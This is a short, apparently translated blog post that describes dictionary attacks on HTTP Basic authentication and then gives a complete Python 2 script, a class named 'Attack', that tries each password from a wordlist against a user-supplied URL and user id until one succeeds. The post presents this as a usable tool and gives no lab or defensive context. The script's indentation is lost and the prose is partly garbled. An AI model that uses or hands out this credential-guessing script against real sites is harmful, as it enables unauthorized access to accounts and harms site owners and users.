Basic authentication does not require a separate GUI-like operation, so In urllib2, there is a class that normally performs Basic authentication. Basic authentication can be a brute force attack or a dictionary attack as long as you know the id. It's a very brute force technique, but if you're lucky or lucky you can find the password.
python
import urllib2, sys, time
class Attack:
def __init__(self, url, userid, dictionary_file):
self.url = url
self.userid = userid
self.password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
self.dictionary_file = dictionary_file
def main(self):
with open(self.dictionary_file, "r") as f:
print "[INFO]: Loading..."
lines = f.readlines()
for password in lines:
try:
self.password_mgr.add_password(None, url, self.userid, password)
handler = urllib2.HTTPBasicAuthHandler(self.password_mgr)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
html = urllib2.urlopen(url)
print "[yes]: password=%s" % (password)
break
except Exception, e:
print "[no]: password=%s" % (password)
if __name__ == "__main__":
url = raw_input("Url >>> ")
userid = raw_input("Userid >>> ")
dictionary_file = raw_input("Dictionary file >>> ")
Attack_ = Attack(url, userid, dictionary_file)
Attack_.main()